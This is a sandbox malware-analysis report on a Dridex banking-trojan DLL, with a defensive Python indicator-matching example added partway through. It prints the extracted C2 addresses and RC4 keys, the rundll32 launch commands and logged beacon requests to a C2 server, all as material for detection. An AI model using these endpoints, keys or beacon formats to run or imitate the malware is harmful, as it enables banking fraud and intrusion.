
Windows Analysis Report SecuriteInfo.com.Variant.Razy.980776.5008.1370

Overview

General Information

Sample Name: SecuriteInfo.com.Variant.Razy.980776.5008.1370 (renamed file extension from 1370 to dll)
Analysis ID: 510696
MD5: 7f1dd5795783f0793caec052daae5b4e
SHA1: 7ffda23921e29ba6ecd911cfe4ccaaba6b8832ca
SHA256: ef94fa9978503a9a126e4f15296c130e039e67636a55acb5b10778e09ee0d1d3
Tags: dll

Detection

Dridex
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Dridex unpacked file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Detected Dridex e-Banking trojan
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7028 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 7064 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7096 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7084 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll,Bluewing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3096 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll,Earth MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6168 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll,Masterjust MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000003.00000002.1194868368.000000006E4C1000.00000020.00020000.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security
00000003.00000003.766529856.0000000002F40000.00000040.00000001.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security
00000002.00000003.765489662.0000000004670000.00000040.00000010.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security
00000004.00000003.779791327.0000000002D40000.00000040.00000001.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security
00000000.00000003.790137281.0000000001120000.00000040.00000001.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security
(2 further entries not shown)

            Unpacked PEs

Source | Rule | Description | Author
3.3.rundll32.exe.2f5db55.0.raw.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security
2.3.rundll32.exe.468db55.0.raw.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security
0.3.loaddll32.exe.113db55.0.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security
3.2.rundll32.exe.6e4c0000.0.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security
2.3.rundll32.exe.468db55.0.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security
(7 further entries not shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
  Source: 0.3.loaddll32.exe.113db55.0.raw.unpack; Malware Configuration Extractor: Dridex {"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}
Multi AV Scanner detection for submitted file
  Source: SecuriteInfo.com.Variant.Razy.980776.5008.dll; ReversingLabs: Detection: 20%
Source: SecuriteInfo.com.Variant.Razy.980776.5008.dll; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: unknown; HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: SecuriteInfo.com.Variant.Razy.980776.5008.dll; Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb; source: loaddll32.exe, 00000000.00000002.1193920617.000000006E587000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1195365441.000000006E587000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.5008.dll
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6E4ECEF8 FindFirstFileExW

Networking:

System process connects to network (likely due to code injection or exploit)
  Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 45.77.0.96 235
  Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 185.56.219.47 180
  Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 192.46.210.220 187
  Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 143.244.140.214 40
C2 URLs / IPs found in malware configuration
  Source: Malware configuration extractor; IPs: 192.46.210.220:443
  Source: Malware configuration extractor; IPs: 143.244.140.214:808
  Source: Malware configuration extractor; IPs: 45.77.0.96:6891
  Source: Malware configuration extractor; IPs: 185.56.219.47:8116
Source: Joe Sandbox View; ASN Name: AS-CHOOPAUS
Source: Joe Sandbox View; ASN Name: KELIWEBIT
Source: Joe Sandbox View; JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: global traffic; HTTP traffic detected: 94 requests to 192.46.210.220 of the form below, all lacking a User-Agent header. Content-Length is 4865 in 47 of them and 4853 in the other 47, and the two sizes alternate almost strictly request by request.
  POST / HTTP/1.1
  Host: 192.46.210.220
  Content-Length: 4865 (or 4853)
  Connection: Close
  Cache-Control: no-cache
Source: Joe Sandbox View; IP Address: 45.77.0.96
Source: Joe Sandbox View; IP Address: 185.56.219.47
Source: global traffic; TCP traffic: 192.168.2.4:49773 -> 143.244.140.214:808
Source: global traffic; TCP traffic: 192.168.2.4:49789 -> 45.77.0.96:6891
Source: global traffic; TCP traffic: 192.168.2.4:49791 -> 185.56.219.47:8116
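The configuration block above and the POST beacons and rundll32.exe connections in this section are the report's raw evidence. The Python below is an added example, not part of the Joe Sandbox report and not Dridex code: it turns the extracted configuration into an indicator set and checks constructed evidence against it, first an HTTP request head with the traits the report shows (POST to /, bare-IP Host, no User-Agent, Connection: Close, Cache-Control: no-cache), then a process network-connect record with Sysmon Event ID 3 style field names. The set of standard web ports, the list of system images, the sample requests and the records are assumptions made for the example; only the configuration string is copied from the report.

```python
"""
Added example (not from the Joe Sandbox report): derive indicators from the
Dridex configuration the extractor printed and apply the report's network
signatures to constructed evidence. Only DRIDEX_CONFIG is copied from the
report; every request and record below is made up for the example.
"""
import ipaddress
import json

# Copied verbatim from the report's "Malware Configuration" section.
DRIDEX_CONFIG = (
    '{"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", '
    '"45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": '
    '["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", '
    '"syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}'
)

# Assumptions for the example, not taken from the report: which ports count as
# "standard" web ports and which images count as system processes that should
# not be talking to the internet on their own.
STANDARD_WEB_PORTS = {80, 443}
SYSTEM_IMAGES = {"rundll32.exe", "regsvr32.exe", "svchost.exe"}


def parse_config(raw):
    """Return (version, {(ip, port), ...}, [rc4 keys]) from the extractor's JSON."""
    cfg = json.loads(raw)
    c2 = set()
    for entry in cfg["C2 list"]:
        host, _, port = entry.rpartition(":")
        # ip_address() raises on anything that is not a literal IP, so a
        # hostname sneaking into the list fails loudly instead of silently.
        c2.add((str(ipaddress.ip_address(host)), int(port)))
    return cfg["Version"], c2, list(cfg["RC4 keys"])


def parse_http_request(raw):
    """Parse the head of a raw HTTP/1.x request (bytes) into method/path/headers."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def beacon_traits(raw, c2):
    """List which traits of the report's POST beacon a request shows.
    An empty list means the request matches none of them."""
    req = parse_http_request(raw)
    h = req["headers"]
    host_ip = h.get("host", "").partition(":")[0]
    try:
        ipaddress.ip_address(host_ip)
        bare_ip = True
    except ValueError:
        bare_ip = False
    traits = []
    if req["method"] == "POST" and req["path"] == "/":
        traits.append("POST to /")
    if "user-agent" not in h:
        traits.append("no User-Agent")
    if bare_ip:
        traits.append("Host is a bare IP")
    if h.get("connection", "").lower() == "close" and h.get("cache-control", "").lower() == "no-cache":
        traits.append("Connection: Close with Cache-Control: no-cache")
    if bare_ip and host_ip in {ip for ip, _ in c2}:
        traits.append("Host is a configured C2")
    return traits


def flag_connection(image, dst_ip, dst_port, c2):
    """Apply the report's network signatures to one process->network record
    (fields named as a Sysmon Event ID 3 entry carries them). Returns reasons."""
    exe = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    reasons = []
    if exe in SYSTEM_IMAGES:
        reasons.append("system process connects to network")
    if dst_port not in STANDARD_WEB_PORTS:
        reasons.append(f"non-standard port {dst_port}")
    if (dst_ip, dst_port) in c2:
        reasons.append("known Dridex C2")
    return reasons


if __name__ == "__main__":
    version, c2, keys = parse_config(DRIDEX_CONFIG)
    print(f"Version {version}, {len(c2)} C2 endpoints, {len(keys)} RC4 keys")
    # Constructed beacon modeled on the report's repeated "POST / HTTP/1.1" lines.
    beacon = (b"POST / HTTP/1.1\r\nHost: 192.46.210.220\r\nContent-Length: 4865\r\n"
              b"Connection: Close\r\nCache-Control: no-cache\r\n\r\n")
    print(beacon_traits(beacon, c2))
    # Constructed record modeled on the report's rundll32.exe -> 45.77.0.96:6891.
    print(flag_connection(r"C:\Windows\SysWOW64\rundll32.exe", "45.77.0.96", 6891, c2))
```

Only the C2 match ties a hit to this sample. "Non-standard port" and "system process connects to network" fire on plenty of legitimate traffic, so treat them as enrichment for the C2 and beacon-shape matches rather than as alerts on their own. The RC4 keys are parsed but not used: the report gives no ciphertext to apply them to.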
Source: unknown; Network traffic detected: HTTP traffic on port 443, seen on the following client ports (in the order the report lists them).
  Client port -> 443 (58 shown): 49817, 50122, 50042, 50139, 50059, 50131, 50154, 49826, 50211, 50219, 49772, 49900, 49866, 49975, 49946, 49929, 49858, 50091, 50186, 49893, 50107, 50004, 50162, 49901, 50227, 50195, 50034, 49947, 50147, 49834, 49873, 49930, 50114, 50130, 49760, 49892, 50001, 49793, 50073, 49850, 49963, 50043, 49921, 50051, 49913, 49825, 50178, 49938, 49955, 50023, 49884, 49865, 50170, 49842, 50193, 49922, 50187, 50090
  443 -> client port (50 shown): 49865, 50217, 50219, 50058, 50179, 50178, 50211, 50059, 49858, 49857, 49975, 50106, 50227, 50226, 49973, 50107, 49850, 50186, 50187, 50072, 50193, 50195, 50073, 49848, 49842, 49963, 49962, 49840, 50115, 50114, 49834, 49955, 49954, 49832, 49794, 49793, 50001, 50122, 50123, 50004, 50090, 50091, 49826, 49947, 49825, 49946, 50139, 50138, 50131, 50130
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50209 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50226 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50217 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50179 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50209
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50201
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50203
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50171
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:06:59 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:01 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:07 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:07 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:10 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:11 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:14 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:15 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:18 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:19 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:22 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:23 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:27 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:27 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:31 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:31 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:35 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:35 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:38 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:39 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:42 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:43 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:46 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:46 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:50 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:50 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:54 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:54 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:58 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:07:58 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:01 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:01 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:05 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:05 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:09 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:09 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:13 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:13 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:17 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:17 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:20 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:21 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:24 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:25 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:28 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:29 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:32 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:33 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:36 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:36 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:40 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:40 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:44 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:44 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
